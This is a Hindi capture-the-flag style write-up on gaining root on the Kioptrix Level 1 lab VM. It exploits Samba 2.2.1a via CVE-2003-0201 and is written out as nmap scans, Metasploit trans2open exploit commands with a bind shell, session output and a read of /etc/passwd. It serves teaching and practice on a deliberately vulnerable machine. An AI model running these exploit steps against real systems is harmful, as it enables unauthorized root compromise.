
Kioptrix लेवल 1 राइटअप - CVE-2003-0201 Samba trans2open
Kioptrix स्तर 1 राइटअप - CVE-2003-0201 Samba trans2open
लेखक: Amirbek Raxmatullayev (@americo_444)
दिनांक: 2026-06-17
प्लेटफ़ॉर्म: VulnHub
कठिनाई: शुरुआती
उद्देश्य: रूट एक्सेस प्राप्त करना
| घटक | विवरण |
|---|---|
| होस्ट ओएस | Ubuntu 26.04 |
| हाइपरवाइज़र | QEMU/KVM |
| लक्ष्य | Kioptrix Level 1 (VMDK) |
| हमलावर आईपी | 192.168.56.1 |
| लक्ष्य आईपी | 192.168.56.101 |
नोट: VirtualBox कर्नेल 7.0.0-22-generic के साथ DKMS KVM नेमस्पेस विरोध के कारण असंगत था। QEMU/KVM पर स्विच किया गया और VMDK को बिना रूपांतरण के सीधे लोड किया गया।
qemu-system-x86_64 \
-m 512 \
-drive file="Kioptix Level 1.vmdk",format=vmdk \
-netdev bridge,id=net0,br=virbr0 \
-device e1000,netdev=net0 \
-display gtk
nmap -sn 192.168.56.0/24
परिणाम: लक्ष्य 192.168.56.101 पर पहचाना गया।
nmap -sV -sC -p- 192.168.56.101
खुले पोर्ट:
msfconsole -q -x "use auxiliary/scanner/smb/smb_version; \
set RHOSTS 192.168.56.101; run; exit"
परिणाम: Samba 2.2.1a — गंभीर रूप से कमजोर संस्करण की पुष्टि हुई।
विवरण:
Samba संस्करण 2.2.x में trans2open फ़ंक्शन में स्टैक-आधारित बफर ओवरफ्लो भेद्यता है। यह एक अनप्रमाणित दूरस्थ हमलावर को रूट के रूप में मनमाना कोड निष्पादित करने की अनुमति देता है।
प्रभावित संस्करण: Samba 2.0.x — 2.2.8
सीवीएसएस स्कोर: 10.0 (गंभीर)
एक्सप्लॉइट मॉड्यूल: exploit/linux/samba/trans2open
msfconsole
use exploit/linux/samba/trans2open
set RHOSTS 192.168.56.101
set LHOST 192.168.56.1
set PAYLOAD linux/x86/shell_bind_tcp
run
bind_tcp के बजाय reverse_tcp क्यों?
reverse_tcp पेलोड विफल रहा क्योंकि Kioptrix VM NAT/ब्रिज कॉन्फ़िगरेशन के माध्यम से हमलावर तक वापस नहीं पहुंच सका। bind_tcp के साथ, हमलावर लक्ष्य से कनेक्ट होता है — पीड़ित से कोई आउटबाउंड कनेक्शन आवश्यक नहीं है।
[*] Started bind TCP handler against 192.168.56.101:4444
[*] Trying return address 0xbffffdfc...
[*] Trying return address 0xbffffcfc...
...
[*] Command shell session 1 opened (192.168.56.1:36733 -> 192.168.56.101:4444)
शेल प्राप्त हुआ! ✅
whoami
# root
id
# uid=0(root) gid=0(root) groups=99(nobody)
hostname
# kioptrix.level1
uname -a
# Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
cat /etc/passwd
# root:x:0:0:root:/root:/bin/bash
# john:x:500:500::/home/john:/bin/bash
# harold:x:501:501::/home/harold:/bin/bash
सिस्टम जानकारी:
[Attacker: 192.168.56.1]
|
| Step 1: nmap full port scan
v
[Target: 192.168.56.101]
|
| Step 2: Samba 2.2.1a identified
v
[Metasploit — trans2open exploit]
|
| Step 3: Stack buffer overflow triggered
v
[Bind shell opened on port 4444]
|
| Step 4: whoami = root
v
[TARGET PWNED]
nmap -sV -sC के साथ सेवा फ़िंगरप्रिंटिंगbind_tcp और reverse_tcp पेलोड के बीच अंतर और प्रत्येक का उपयोग कब करें| उपकरण | उद्देश्य |
|---|---|
| nmap | पोर्ट स्कैनिंग, सेवा/संस्करण पहचान |
| Metasploit Framework | SMB गणना, शोषण |
| QEMU/KVM | लैब वर्चुअलाइज़ेशन |
| arp-scan | होस्ट डिस्कवरी |
Amirbek Raxmatullayev द्वारा लिखित | BEK Coders Security Research | 2026
| पोर्ट | सेवा | संस्करण |
|---|
| 22/tcp | SSH | OpenSSH 2.9p2 |
| 80/tcp | HTTP | Apache 1.3.20 |
| 111/tcp | RPC | rpcbind 2 |
| 139/tcp | SMB | Samba 2.2.1a |
| 443/tcp | HTTPS | mod_ssl/2.8.4 |
| 32768/tcp | Status | RPC #100024 |